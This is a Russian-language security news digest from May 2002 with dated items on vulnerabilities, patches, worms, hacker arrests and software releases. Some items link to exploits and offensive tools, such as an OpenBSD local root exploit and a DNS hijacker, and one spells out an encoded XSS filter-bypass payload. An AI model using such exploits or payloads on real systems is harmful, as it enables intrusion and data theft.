В релизе пофиксены баги с переполнением буфера, имевшие место в предыдущих версиях, для ключей RSA установлена минимальная длина в 768 бит, улучшена поддержка смарткард и внесены другие полезные изменения. Подробности - http://www.linuxsecurity.com/articles/cryptography_article-5003.html
17/05/2002 ФБР арестовало двух членов хакерской группы 'Deceptive Duo'.
Как сообщает vnunet, 16 мая ФБР арестовало двух членов хакерской группы 'Deceptive Duo', которые ранее взломали большое количество сайтов, принадлежащих правительственным и военным структурам. Свою деятельность по взлому сайтов (хотя здесь скорее стоит говорить о дефейсе) группа начала в апреле. Как сказали сами члены группы, их целью было обнаружение потенциально опасных уязвимостей в информационной инфраструктуре США, которое особенно актуально после событий 11 сентября прошлого года. Как сообщается, арестованы были Robert Lyttle по кличке Pimpshiz (бывшая группа pro-Napster) и The-Rev (полное имя почему то не приводится), бывший член группы, занимавшейся дефейсом сайтов Sm0ked Crew. Скоро члены группы предстанут перед окружным судом Калифорнии. Подробности - http://www.vnunet.com/News/1131810
17/05/2002 Открытие исходников Windows улучшит ее безопасность.
Согласно недавнему заявлению аналитиков Gartner, Microsoft должна открыть исходный код Windows для всех. Такой шаг, по мнению экспертов, положительно скажется на безопасности программного обеспечения. Мнение аналитика Джона Пескатора, сотрудника Gartner, противоположно заявлениям вице-президента Microsoft Джима Олчина, который недавно заявил, что Windows была бы более уязвимой, если ее бы исходники были открыты для общего доступа. Пескатор отмечает, что в настоящее время хакеры не очень утруждают себя нахождением дыр в безопасности системы, несмотря на закрытые и строго оберегаемые исходные тексты. "Стратегия компании на сохранение безопасности путем засекречивания уже доказала свою бесполезность. Для того чтобы сделать будущие версии программ более надежными, Microsoft должна производить такой код, который в состоянии выстоять анализ независимых экспертов", - пишет аналитик Gartner. Источник - http://www.securitylab.ru/?ID=30864
17/05/2002 Новый кумулятивный патч для IE от Microsoft не закрывает "дыр" в безопасности.
После объявления о выходе комплексного патча для IE от Microsoft сразу несколько специалистов по безопасности объявили, что этот патч свосем не устраняет тех уязвимостей, для которых, собственно он предназначался. Так почти одновременно заявили GreyMagic Software ("MS02-023 does not patch actual issue!"), Thor Larholm из Дании ("Update and comments on the MS02-023 patch, holes still remain") и SNS ("[SNS Advisory No.48] Microsoft Internet Explorer Still Download And Execute ANY Program Automatically"). Как следует из этих писем, пропатченым в какой-то степени оказался только IE 6.0, в то время, как в IE 5.0 и 5.5 уязвимости остались. Напомним, что к их числу относятся: межсайтовый скриптинг (cross-site scripting); получение доступа к локальным файлам, используя недостаток в обработке Cascading Style Sheets; подмена зоны безопасности и т.д. (всего 6 штук). Один из написавших письмо, Thor Larholm из Дании, на своём сервере создал список всех уязвимостей, которые присутствуют в броузере Internet Explorer. Как пишет автор, если до выхода патча их было 16, то сейчас осталось 12. Тем не менее, в описании к патчу от Microsoft, указывается, что он закрывает все уязвимости в IE. Перечень уязвимостей в IE - http://jscript.dk/unpatched/
17/05/2002 Доступ к специальным устройствам в Internet Explorer и Outlook Express может привести к DoS и потере важшых данных.
Как указывают в своём послании в BUGTRAQ российский специалисты по безопасности ERRor и 3APA3A, ими были обнаружены уязвимости в популярных программах Internet Explorer и Outlook Express. Несанкционированный доступ к специальным устройствам DOS (prn, aux, nul и т.д) может привести к различным неприятным последствиям, начиная с некорректной работы службы или программы, производящей попытку доступа к файлу и заканчивая повреждением физического устройства или компрометацией важных данных. C помощью тэга <BGSOUND> в сочетании со специальным именем устройства можно вызвать зависание Outlook Express. При этом возвращение программы в рабочее состояние без потери архива писем является нетривиальной задачей. Во время исследования этой проблемы было выявлено, что с помощью тэга <IFRAME> можно послать любые данные в специальное устройство. Так же, проблемой является то, что исходный файл тэга <BGSOUND> загружается всегда и слюбого сайта независимо от установок зоны безопасности. На своём сайте www.security.nnov.ru авторы продемонстрировали 2 примера использования подобных уязвимостей. В первом из них на ваш принтер (при его наличии, конечно) выводится строчка, во втором-демонстрируется возможность проведения DoS против Outlook Express. Microsoft на обращение (24 апреля) пока никак не отреагировал. Подробное описание - http://www.security.nnov.ru/advisories/msiedos.asp
17/05/2002 Обнаружена уязвимость в плагине Flash 6 для веб-браузеров.
Компания eEye сообщает об обнаружении уязвимости в плагине Flash 6, используемом для проигрывания Flash-контента в веб-браузерах. Уязвимость присутствует во Flash Active OCX 6 revision 23, который присутствует в большинстве существующих версий операционных систем Windows. С помощью данной уязвимости возможно запускать программный код на машине пользователя. Уязвимость можно задействовать путем отправки неверных параметров ActiveX-компоненту Flash 6, что вызывает переполнение буфера. Код эксплойта может быть отправлен пользователю по e-mail, размещен на сайте или в локальном html-документе. Источник - http://www.compulenta.ru/2002/5/16/29648/
17/05/2002 Microsoft выпустила гигантский патч для Internet Explorer.
Компания Microsoft выпустила очередной двухмегабайтный патч для браузера Internet Explorer. Обновление программы решает проблемы с шестью уязвимостями и отмечено софтверным гигантом как "критическое". Обновление выпущено для версий Internet Explorer 5.01, 5.5, 6.0. Наиболее опасная уязвимость позволяет запускать скрипты на компьютере пользователя с локальными настройками безопасности. Данная уязвимость обнаружена в только в шестой версии IE. Еще одна уязвимость позволяет получать доступ к файлам на жестком диске пользователя (только для чтения, изменения файлов невозможно). Подробности - http://www.compulenta.ru/2002/5/16/29652/
16/05/2002 Страницы истории.
Судебная практика по делам о преступлениях в сфере компьютерной информации. Выдержки из обвинительного заключения по уголовному делу №30, направленному в суд следователем РУ ФСБ РФ по Архангельской области. http://kurgan.unets.ru/~procur/delo5.htm Остальные документы: http://kurgan.unets.ru/~procur/my_page.htm
16/05/2002 В Испании проводится первый в истории турнир хакеров.
В Испании проводится первый в истории хакерский турнир. Таким образом, у испанских "хакеров" появилась возможности выйти на время из подполья и завоевать "черный берет", которым будет награжден самый ловкий и самый умелый эксперт по взлому сайтов и серверов, сообщает El Mundo. "Черными беретами" называют самую известную международную хакерскую группировку. Принять участие в этом весьма оригинальном состязании уже вызвались 5 тыс. человек, из которых по меньшей мере 45 являются хакерами высочайшего класса, отмечает издание. Турнир состоит из 10 заданий, в каждом из которых участники должны взломать веб-сайт. Первые задания достаточно просты и не требуют большой хакерской подготовки, однако затем их сложность возрастает, так что к последним этапам смогут выйти лишь самые маститые "интернет-взломщики". В качестве организатора конкурса выступает испанский Институт интернет-безопасности, который использует для конкурсных заданий различные системы защиты информации, распространенные в Интернете. Некоторые из них весьма редки и требуют от хакера опытности и сноровки, другие системы повсеместно используются в глобальной сети, в том числе компанией Microsoft, банками, сетевыми изданиями и интернет-магазинами. В каждом задании нужно найти нужный пароль для того, чтобы перейти на следующий этап. Для этого претенденты на звание "черного берета" должны владеть самыми разными техниками "взлома" - поисками "дыр", взломом SQL, скриптов, декомпиляцией кода Java, взломом зашифрованных алгоритмов, подменой заголовков HTTP и др. Вследствие высокой сложности заданий и большого количества участников ожидается, что турнир продлится более двух недель. Источник - http://www.securitylab.ru/?ID=30856
16/05/2002 Вышел PHP 4.2.1.
Улучшена безопасность (проверки safe_mode в функции show_source(), parse_ini_file(), rmdir() и директивы safe_mode_include_dir) Улучшена совместимость DOMXML и добавлены новые функции Исправлены ошибки функции array_sum(), array_merge() Для тех кто работает с сессиями - исправлена работа с SID (была ошибка при выключенных cookies) Подробности - http://www.php.net/release_4_2_1.php
16/05/2002 A variant of "Word Mail Merge" vulnerability.
Найдена очередная уязвимость в Microsoft Office, которая опять повторяет собой предыдущие ошибки. Да сих пор возможно исполнять макросы в документах без разрешения используя абсолютные или относительные пути. Чтобы использовать эту уязвимость, злоумышленник должен иметь возможность скопировать Word и Access файлы в одну и ту же директорию. Подробности: http://www.security.nnov.ru/advisories/mailmerge.asp
16/05/2002 Linux NTFS 2.0.7b.
Вышла новая версия драйвера поддержки файловой системы NTFS для ядра 2.4.18. Это бэкпорт с ветки 2.5. Как и прежде, доступ к файловой системе организован только по чтению. Возможности записи пока нет. Подробности - http://freshmeat.net/releases/84164/
16/05/2002 Opera 6.0 for Linux: релиз вышел.
15 мая выпущен релиз версии 6.0, ранее доступной лишь в виде technology preview и различных бет. Последующие улучшения локализации для non-Roman alphabets, использование MDI и SDI интерфейсов, новые возможности администрирования пльзовательских настроек, (/etc/opera6rc и /etc/opera6rc.fixed), исправлены замеченные crash bugs. Подробности - http://www.opera.com/pressreleases/en/2002/05/20020515.html
16/05/2002 Уязвимость в javascript броузера Opera.
Andreas Sandblad, студент факультета инженерной физики из унивеситета Umea (Швеция) cообщает о найденной им уязвимости в броузере Opera. Cвязана она с тэгом iframe в javascript. При попощи соответствующим образом сформированного скрипта Web-сервер получает доступ к файлу cookies На компьютере жертвы, к файловой структуре и содержимому кэша. Уязвимости подвержены версии 6.0, 6.01 для Windows. Версия 5.x не поддерживает тэг iframe, но подобного результата можно достигнуть на этой версии броузера при помощи тэга FRAME. Opera подтвердила существование этой уязвимости и выпустила новую версию своего броузера 6.02 для Windows, которая доступна для скачивания с сервера компании с 15 мая. Также в Opera 6.02 улучшены существующие функции и добавлены новые, в службу поиска добавлены новые поисковые системы. Интересным нововведением является возможность отправки SMS прямо из программы. Подробности о новой версии Opera - http://www.opera.com/pressreleases/en/2002/05/20020515_2.html
16/05/2002 Утилита против Klez оказалась трояном.
"Лаборатория Касперского" предупреждает пользователей, что с одного австралийского сервера произведена массовая рассылка троянской программы "TrojanDownloader.Win32.Smokedown", замаскированной под средство для борьбы с почтовым червём "Klez". Вредоносная программа была разослана по электронной почте. Зараженные письма имеют формат HTML. В нем содержится рекомендация "принять срочные меры" против нарастающей угрозы со стороны червя Klez. В качестве отправителя письма указан абонент "Kaspersky Labs" и адрес "support@kaspersky.com". В теле письма также содержится замаскированный Java-скрипт, который незаметно загружает с удаленного сервера троянскую программу "Smokedown" и устанавливает ее на компьютер. Источник - http://www.kaspersky.ru/news.html?id=725127
16/05/2002 В Microsoft работают над четвертым Service Pack для Windows 2000.
Как утверждается на сайте Warp2Search, компания Microsoft начала работу над четвертым набором исправлений и дополнений к операционной системе Windows 2000. В настоящее время проводится бета-тестирование третьего Service Pack для данной системы. Источник - http://www.izcity.com/
15/05/2002 Большое количество книг по компьютерной, сетевой и security тематике можно найти по этому адресу:.
http://h4x0r.com.ar/NEWBOOKZ/
15/05/2002 У зоны *.pro начались проблемы.
Введение новой доменной зоны оставляет еще немало вопросов. Главный из них, - какие рода человеческой деятельности относить к профессиональным, а какие нет, сообщает Newsbytes. Если доменные имена в указанной зоне можно будет регистрировать только профессионалам, то оператору-регистранту придется совершенствовать свои системы проверки данных о потребителях. Очевидно, профессионализм должен будет подтверждаться определенным сертификатом или университетским дипломом. Подробности: http://webplanet.ru/article/891.html
15/05/2002 Большинство домашних компьютеров заражены вирусами.
Владельцы домашних компьютеров в США уделяют недостаточное внимание защите от вирусов и хакерских атак. К такому выводу пришли сотрудники издания Consumer Report в ходе проведенного среди своих подписчиков опроса. Подробные результаты исследования будут опубликованы в июньском номере Consumer Report, а об его основных выводах сообщил сайт Newsbytes Подробности: http://www.compulenta.ru/2002/5/15/29537/
15/05/2002 Mac OS X для PC появится уже в этом году?.
Слухи о возможном переносе операционной системы Mac OS на компьютеры на базе Intel-совместимых процессоров (иначе говоря, на PC) ходят уже давно. Зимой в разных сетевых изданиях появились несколько статей, авторы которых обсуждали вероятность такого шага со стороны компании Apple. Подробности: http://www.compulenta.ru/2002/5/15/29548/
14/05/2002 Новая интересная программа: Dns hijacker.
Это самый настоящий сниффер\спуффер, который умеет подменять ДНС записи. Подмена может происходить, как по заготовленному шаблону, так и на один адрес. Кроме того, в программу встроен монитор отслеживания всех днс запросов. Скачать программу можно здесь: http://pedram.redhive.com/projects.php
14/05/2002 Краткая история Интернета.
Список самых важных дат в зарождении и развитии интернета, начиная с сетей ARPA и заканчивая сегодняшним днем. Читать здесь: http://www.rol.ru/news/it/internet/02/05/13_015.htm
14/05/2002 В Британии родителей в школу будут вызывать по интернету.
Правительство Великобритании обнародовало планы перевода переписки учебных заведений с гражданами на электронную основу. Теперь, как сообщает BBC, родители будут сразу узнавать все о проделках своих чад. Новая почтовая система будет добровольной: родителям, которые согласятся участвовать в ней, нужно будет лишь уведомить об этом школу заранее. Предполагается, что к 2005 году значительная часть всех школьных административных систем будет параллельно функционировать в режиме онлайн. На сегодня почти все школы Великобритании подключены к интернету. Выход в сеть есть и у 40% всех английских семей. Подробности: http://www.rol.ru/news/it/internet/02/05/13_014.htm
13/05/2002 Семинар "Интеграция UNIX- Windows-систем".
16 мая 2002 г. фирма SoftLine в связи с большим интересом проявленным к прошедшим семинарам по Sun, VERITAS и Unix-системам проводит семинар "Интеграция UNIX- Windows-систем". Семинар будет проводиться с 9.00 до 12.30. С докладом выступит Юрий Кожаров, SoftLine. Адрес проведения семинара - г.Москва, ул. Губкина, д. 8 Подробная информация - Здесь
13/05/2002 Антивирусы Panda для Linux.
Компания Panda Software, специализирующаяся на производстве систем информационной безопасности выпустила несколько продуктов для антивирусной защиты почтовых SMTP-шлюзов в системах Linux - PerimeterScan. Эти антивирусные программы разработаны для защиты SMTP-трафика в системах Sendmail, Qmail и Postfix, для каждой выпущено свое отдельное издание: -PerimeterScan Sendmail Edition защищает платформы Solaris, AIX и др.; предусмотрена возможность распределения антивирусной защиты на несколько серверов. -PerimeterScan Qmail Edition обеспечивает защиту SMTP трафика одновременно при выполнении сервером функций шлюза и почтового сервера. -PerimeterScan Postfix Edition защищает все сообщения, адресованные клиентам Postfix-сервера и другим получателям. Любой из перечисленных антивирусов может быть установлен под Linux RedHat, SuSe, Best Linux и Mandrake. C целью обеспечения постоянной защиты от новых вирусов программы снабжены полностью автоматическим механизмом обновления антивирусных баз. Cкачать для тестирования - http://www.pandasoftware.com/beta/
13/05/2002 Выпущена очередная бета-версия WinAMP 3.
Разработчики популярного софтового MP3-плеера WinAMP представили очередную бета-версию WinAMP 3 Build 472. В третьей версии программы разработчиками обещана масса нововведений, в том числе и возможность проигрывания видеофайлов. Вот что разработчики говорят о третьей версии WinAMP: "Разработка WinAMP 3 приближается к завершению, и мы лопнем, если не заявим об этом релизе во всеуслышание. Мы уже достаточно далеко зашли, чтобы серьезно заявлять о продукте, настолько удивительном, что он способен раньше времени вызвать конец света". Обещающе-шутливый тон разработчиков пока не подтверждается фактами. К сожалению, в каждом билде Winamp 3 пользователи обнаруживали какую-либо досадную ошибку, делающую использование бета-версии, мягко говоря, неудобным. Впрочем, на то она и бета-версия - в билде 472, к примеру, не работает плейлист, причем это сделано сознательно. Кнопки добавления файлов или директории заменены на слово "GAY" и не функционируют. Скачать Winamp 3 Build 472 - http://www.winamp.com/nsdn/winamp3x/sdk/files/wa3install-full_build472.exe
13/05/2002 Cтатья И.Трофимова "Про ЭТО".
Несмотря на несколько пикантное название (вспоминается передача на НТВ с "афроамериканорусской" Хангой "Про ЭТО"), довольно любопытная статья. Основная тема которой-"Почему программное обеспечение, выпускаемое под маркой Free software и GPL, получается более добротно сделанным и более устойчиво работающим, чем коммерческое ПО (соответственно с закрытым кодом)?". Это касается как операционных систем, так и отдельных программных продуктов. В конце статьи автор подводит итог набором пакетов, которые бы он поставил на компьютер в минимально необходимой для работы (и души) конфигурации. Сам И.Трофимов является одним из разработчиков проекто Multilinux. Последние строчки статьи звучат довольно многообещающе: "Все идеи этой статьи использованы, или будут использованы в дистрибутиве Мультилинукс. Статья доступна здесь - http://multilinux.sakh.com/stat/7.php
13/05/2002 FreeBSD освобождается от Perl'а.
В списке рассылки freebsd-current с подачи Mark Murray было предложено покончить-таки с использованием Perl в базовой системе FreeBSD, и вынести Perl в порты. То немногое, что надо переписать (уже переписывается) на sh/awk/sed или C, не стоит того, чтобы в базовой установке держать такое угрожающе растущее Perl-хозяйство. Подробности - http://docs.freebsd.org/cgi/getmsg.cgi?fetch=415449+0+current/freebsd-current
13/05/2002 Книга Фредерика Брукса "Мифический человеко-месяц".
Легендарная книга Фредерика Брукса "Мифический человеко-месяц" на сервере itinfo.spb.ru. Весьма рекомендуется для прочтения (разработчикам в особенности). Книга ещё в стадии доработки, а потому bugreports (сообщения об ошибках) принимаются в особом порядке. Также принимаются любые замечания и комментарии. Книга доступна - http://www.itinfo.spb.ru/Articles&books/index.html
12/05/2002 "Лаборатория Касперского" и учебный центр компании ЭВРИКА открывают курсы по информационной безопасности в Санкт-Петербурге .
"Лаборатория Касперского", ведущий российский разработчик систем информационной безопасности, и учебный центр компании ЭВРИКА объявляют об открытии первых в Санкт-Петербурге курсов по защите компьютеров и вычислительных сетей. Появление данных учебных курсов, а также начало их преподавания в Санкт-Петербурге учебным центром ЭВРИКА, связано с исключительной актуальностью темы компьютерной безопасности как ключевого элемента в обеспечении бесперебойного функционирования информационных систем. Наиболее эффективным способом решения данной задачи является использование продуктов "Лаборатории Касперского" - одного из лидеров в области разработки средств защиты компьютеров и сетей от вредоносных кодов и внешних вторжений. Благодаря качеству, доступности и отличным потребительским характеристикам продукты компании приобрели высокую популярность среди всех категорий пользователей, что, в свою очередь, предопределило потребность ИТ-специалистов в обучении работе с этими продуктами. 6 мая учебный центр компании ЭВРИКА начал преподавание по программе курса "Системный инженер" в области обеспечения защиты данных на основе продуктов "Лаборатории Касперского". Курс предназначен для сетевых администраторов, системных инженеров, сотрудников ИТ-отделов, отвечающих за безопасность информационных систем. В ходе обучения, которое продолжается 3 дня, слушатели получают теоретические и практические навыки внедрения, настройки, мониторинга и управления систем антивирусной защиты на основе продуктов "Лаборатории Касперского". Также в рамках курса рассматриваются вопросы оценки ресурсов, необходимых для внедрения системы антивирусной защиты, определение длительности работ, планирование этапов внедрения. Учебный курс разработан непосредственно специалистами "Лаборатории Касперского", что гарантирует полноценное отражение всех аспектов работы с продуктами. Подробности - http://www.eureca.ru
12/05/2002 Обнаружена серьезная дыра в защите SIM-карт сотовых телефонов .
Исследователи компании IBM сообщили об обнаружении ими серьезной дыры в криптозащите SIM-карт. По заявлению исследователей, снять криптозащиту SIM-карты сотового телефона можно всего за пару минут. Решение придать эту информацию огласке было принято лишь тогда, когда специалисты компании разработали и проверили технологию, устраняющую уязвимость в системе защиты. До настоящего времени извлекать защитные ключи из SIM-карт специалистам удавалось не менее чем за 8 часов и только с помощью мощнейших криптоанализаторов. В IBM пошли иным путем. Если в процессе введения ключей в SIM-карту взломщик будет регистрировать такие побочные эффекты, как электромагнитное излучение чипа и потребление энергии в его каналах, то секретный 128-битовый код он сможет узнать быстро и без всякого криптооборудования. Специалистам уже давно известен способ, при котором можно получать информацию о процессах в вычислительных устройствах по "побочным" каналам. Но и индустрия полупроводников тоже не стоит на месте - большинство современных чипов, исполняющихкриптографические алгоритмы, способны сопротивляться "побочной" информационной утечке. Источник - http://www.bezpeka.com/news/index.html#11-05-07
12/05/2002 Вышла новая версия броузера Mozilla 1.0 RC2.
В этой версии исправлены ошибки и падения, обнаруженные в RC1. В новую версию Mozilla также включена полная поддержка CSS2. Подробности - http://www.mozilla.org/releases/mozilla1.0/
12/05/2002 OpenOffice 1.0 теперь доступен и для MacOS X.
Сообщается о выходе OpenOffice 1.0 для MacOS X. Open Office - большой и серьезный проект, а главное удобный офисный пакет, будет хорошим конкурентом M$ Offise, который для мака по отзывам содержит много "багов". Подробности - http://zdnet.com.com/2100-1104-902358.html
11/05/2002 Вирус Klez.h теперь заражает еще и Win95.CIH.
Вирус Klez.h, новая, но очень активная модификация вируса Klez, заразился сам и стал еще более опасен. Вирус-червь Klez.h был выявлен 16 апреля 2002 года. Он попадает в систему Windows после того, как пользователь откроет инфицированное им письмо, то есть не нуждается в запуске каких-либо исполняемых файлов, приложенных к почтовому сообщению. В двадцатке вирусов Лаборатории Касперского за апрель I-Worm.Klez занимает первое место с абсолютным отрывом - 94,5 %. По данным английской антивирусной компании MessgeLabs, он является четвертым по распространенности вирусом за всю историю. Тем не менее, сам по себе Klez не является деструктивным вирусом, приводящим к фатальным последствиям для компьютера. Это скорее программа- хулиган, которая по записям в адресной книге Outlook рассылает различные файлы, распространяя свою копию в Сети. Хотя, безусловно, и эти действия могут привести в весьма тяжелым последствиям, особенно у компаний, чей бизнес зависит от интернета. Теперь же обнаружилось, что некоторые версии Klez содержат в себе вирус Win95.CIH (Chernobyl), который в тринадцатую годовщину чернобыльской трагедии 26 апреля 1999 года нанес серьезный вред более чем полумиллиону компьютеров, сделав нечитаемым содержимое жестких дисков или уничтожив BIOS. Особенно пострадали тогда Южная Корея и Турция. Эксперты-вирусологи ожидают, что в этот раз симбионты Klez и W95.CIH.1049 нанесут свой удар 2 августа 2002 г. Источник - http://www.compulenta.ru/2002/5/8/29341/
11/05/2002 Уязвимость в SafeWeb.
SafeWeb-это анонимайзер, обеспечивающий анонимность пользователя, использующего этот сервис при посещении серверов в Интернет. Достигается это шифрацией траффика между компьютером пользователя и сервером SafeWeb. В своём письме BUGTRAQ Эндрю Хинтц утверждает, что им обнаружен способ, который позволяет на основании анализа количества данных, переданных к пользователю, определить сайты, которые он посещает при помощи SafeWeb. Эта технология может быть использована правительственными организациями (автор указывает на китайское правительство в своём письме) для нарушения конфиденциальности своих граждан. Необходимо отметить, что проект SafeWeb частично финансируется ЦРУ. Автор также приводит исходный код эксплоита на Перле. Подробное описание - http://guh.nu/projects/ta/safeweb/ Эксплоит - http://guh.nu/projects/ta/safeweb/fingerprint.pl
11/05/2002 Очередная группа серверов, подверженных Cross-site scripting.
На этот раз очередной список серверов, подверженных уязвимости типа CSS опубликовала группа GOBBLES (http://www.bugtraq.org/). GOOBLES утверждают, что это новый вид CSS. Заключается он в особенности HTML, называемой JavaScript entity. Это технология кодирования символов, позволяющая обойти фильтры, настроенный на отсечение запросов вида "<...>", "<script>...</script>, "javascript:". По этой технологии строка &{alert('GOBBLES')}; превращается в строку %26%7balert%28%27GOBBLES%27%29%7d%3b. В дополении к этой методике CSS, GOBBLES описали т.н. технику "HTML string completion / HTML closure", использование которой идентично технике внедрения SQL-запросов. Среди подверженных этой уязвимости сайтов называются довольно громкие имена: openbsd.org (скрипт man.cgi), happyhacker.org (thttpd webserver, ssi-программа), thievco.com (скрипт гостевой книги Matt Wright's), antionline.com / fatelabs.com ( vbulletin php-пакет), cern.ch, cansecwest.com, sans.org, 2600.com, snort.org, nessus.org, whitehats.com, ciac.org, infowar.com, security.nnov.ru (скрипт exploits.asp). Более подробное описание доступно по ссылке, приведённой ниже. Подробности - http://www.bugtraq.org/advisories/GOBBLES-33.txt
11/05/2002 Первый фестиваль LINUX и свободного программного обеспечения.
Ассоциация пользователей LINUX из Турции 16-19 мая 2002 организует в Анкаре первый фестиваль Linux и свободного программного обеспечения (1st Linux and Free Software Festival). В рамках фестиваля предполагается проведение 11 семинаров по информационной безопасности. 5 из них будут проведены группой Dikey8 - некоммерческой организацией, занимающейся сетевой безопасностью. Подробности - http://senlik.linux.org.tr:
11/05/2002 Патчи для OpenBSD.
FozZy из Hackademy и электронная газета Hackerz Voice (http://www.hackerzvoice.org) в BUGTRAQ изложили материалы своих исследований ОС OpenBSD. В результате этих исследований была изложена теория получения прав суперпользователя в этой ОС - т.н. local root exploit. Это было связано с возможностью локального пользователя переполнить таблицу дескрипторов файлов ядра. Это может привести как к атаке типа DoS, так и к получению полномочий root. Группа разработчиков OpenBSD тут же выпустила патчи к релизам своей ОС -2.9, 3.0, 3.1 Эксплоит - http://www.dmpfrance.com/fd_openbsd.c Патч для Open BSD-3.1 - ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/003_fdalloc2.patch OpenBSD-3.0 - ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/021_fdalloc2.patch OpenBSD-2.9 - ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.9/common/026_fdalloc2.patch
10/05/2002 Уязвимость в Linux Netfilter.
В Linux Netfilter (iptables) группой из Франции Cartel Sйcuritй обнаружена уязвимость, которая приводит к получению важной информации от сервера, который защищён при помощи Linux Netfilter. Уязвимость присутствует в Netfilter, в котором используется NAT (Network Address Translation - он же маскарадинг). Если по каким-либо причинам сервер в ответ на пришедший легальный пакет формирует ICMP error cообщение в ответ, внутри этого пакета содержится ИСТИННЫЙ (внутренний )адрес IP-адрес хоста, для которого формируется это сообщение. Cartel Sйcuritй рекомендует пересобрать ядро с соотвествующим патчем ядра. Уязвимости подвержены ядра версий 2.4.4 - 2.4.19-pre6 с версией ipables < 1.2.6a. Также доступен патч для nmap, который позволяет использовать эту уязвимость. Патч для ядра доступен здесь -http://www.cartel-securite.fr/pbiondi/2.4.19-pre6_icmp-nat.patch Патч для nmap - http://www.cartel-securite.fr/pbiondi/nmap/
10/05/2002 Обнаружена уязвимость в DHCP-сервере.
В DHCP сервере, выпускаемом ISC (Internet Software Consortium), обнаружена уязвимость. Этот сервер по умолчанию "собирается" с опцией NSUPDATE, предназначенной для обработки DNS-запросов и обновления информации о база данных имён хостов (DNS) на DHCP-сервере. Это информация фиксируется в лог-файле DHCP-сервера. Ошибка в коде, при помощи которой производится запись в лог-файл, позволяет злоумышленнику выполнить код от имени пользователя, запустившего DHCP (обычно root). Подобную атаку можно провести удалённо. CERT выпустила информационный бюллетень с подробным описанием уязвимости и с рекомендациями для администраторов серверов, которые применяют в своих сетях протокол DHCP (Dynamic Host Configuration Protocol). Уязвимость была обнаружена Next Generation Security Technologies (ngsec). Присутствует в версиях до 3.0.1rc8 включительно. Патч для ISC DHCPD доступен. Информационный бюллетень CERT - http://www.cert.org/advisories/CA-2002-12.html Подробное описание от NGSEC - http://www.ngsec.com/docs/advisories/NGSEC-2002-2.txt
10/05/2002 Конференция по компьютерной безопасности Summercon 2002.
С 31 мая по 2 июня в Вашингтоне в отеле Renaissance. Summercon является одной из самых старейших хакерских конференций. проходила ранее в таких городах, как Сент-Луис, Атланта, Вашингтон и Амстердам. Конференция активно поддкрживается Phrack. Регистрация начёнтся в пятницу 31 мая в 6 часов вечера по местному времени. Более подробная информация о конференции - http://www.summercon.org/conference/
10/05/2002 Сокрытие и восстановление данных в Linux.
На сайте Softerra опубликована достаточно интересная статья о скрытии и восстановлении данных под Linux. Приводятся названия и ссылки на программы, которые облегчат эти поставленные задачи. Линуксоидам советуем ознакомиться. Статья лежит здесь: http://www.softerra.ru/freeos/17652/page1.html
10/05/2002 Обнаружены множественные уязвимости в ПО Novell Netware.
Как сообщают Patrik Karlsson & Jonas Lдndin из cqure.net, ими были обнаружены уязвимости во многих продуктах Novell Netware. Cреди них называются: Netware FTP server, Novell Netware client for Windows (тестировались Win2K/XP), Novell Border Manager 3.6, загружаемый модуль SDMR.NLM (обеспечение IPX-совместимости). Все программные продукты тестировались на версии Netware 6.0 SP 1. Официальных патчей от Novell пока не появилось. Подробное описание уязвимостей доступно по ссылке ниже. Все они датированы 8 мая 2002 г. Подробное описание - http://www.cqure.net/advisories/
10/05/2002 Links 0.97.
Вышла новая версия отличного текстового браузера. В основном полезные исправления, большие формы работают быстрее. Подробности - http://artax.karlin.mff.cuni.cz/~mikulas/links/download/Changelog
10/05/2002 Наследство, оставленное некоторыми старыми версиями приложений Microsoft Office, делает потенциально уязвимой конфиденциальную информацию и ослабляет защиту правительственных и коммерческих веб-сайтов во всем мире.
Google сообщает, что на различных веб-сайтах для загрузки доступно свыше полумиллиона файлов .doc Microsoft Word. Среди них небольшой, но заметный процент составляют файлы, созданные с использованием версий ПО, производящих «дырявые» документы. Баг, впервые обнаруженный в 1998 году, приводит к тому, что в неиспользуемые области документа попадают произвольные фрагменты данных из удаленных ранее файлов. Они могут содержать все, что когда-либо хранилось на компьютере пользователя, в том числе пароли, разделы других документов или письма. В документе эти данные остаются невидимыми, но, если его загрузить и просмотреть при помощи редактора шестнадцатеричных кодов, их легко можно будет прочитать. Подробности: http://zdnet.ru/?ID=186764
10/05/2002 Американские законодатели одобрили ужесточение антихакерских законов.
Агентство Reuters сообщило об одобрении комитетом по юстиции Палаты представителей США законопроекта, предусматривающего ужесточение наказаний за компьютерные преступления. Одновременно законом расширяются права провайдеров на слежку за своими пользователями. Подробности: http://www.compulenta.ru/2002/5/8/29404/
10/05/2002 Yandex bar шпионит за своими пользователями?.
На сайте http://www.winfaq.com.ru появилось сообщение, в котром программа Yandex Bar обвиняется в шпионаже за пользователем. Причем на адрес yandex передаются не только адреса, которые посещает пользователь, но и все необходимые для авторизации сведения - имя пользователя и пароль. Реакция компании Yandex на это заявление пока не известна. Источник: http://www.winfaq.com.ru:8101/ubb/Forum7/HTML/000236.html
8/05/2002 Apache 2.0.36.
Вышел новый релиз популярного Вэб-сервера Apache 2.0.36. Все изменения см. ниже. Изменения - http://www.apache.org/dist/httpd/CHANGES_2.0
8/05/2002 Michael Smith уходит из FreeBSD Core Team.
Michael Smith, один из основных участников проекта FreeBSD, сообщил о уходе из core team в связи с потерей интереса и проблемами развития проекта. Подробности - http://docs.freebsd.org/cgi/getmsg.cgi?fetch=260229+0+current/freebsd-hackers
7/05/2002 Net-SNMP 4.2.5.
Новая версия старой реализации пакета для работы с SNMP протоколом. Скачать - http://download.sourceforge.net/net-snmp/ucd-snmp-4.2.5.tar.gz
7/05/2002 Linux 2.5.14.
Новая версия ядра Linux "нестабильной" ветви. Changelog - http://linuxtoday.com/news_story.php3?ltsn=2002-05-06-009-26-NW-KN-DV Скачать - ftp://ftp.kernel.org/pub/linux/kernel/v2.5/linux-2.5.14.tar.bz2
7/05/2002 Новый червь ругается на Билла Гейтса.
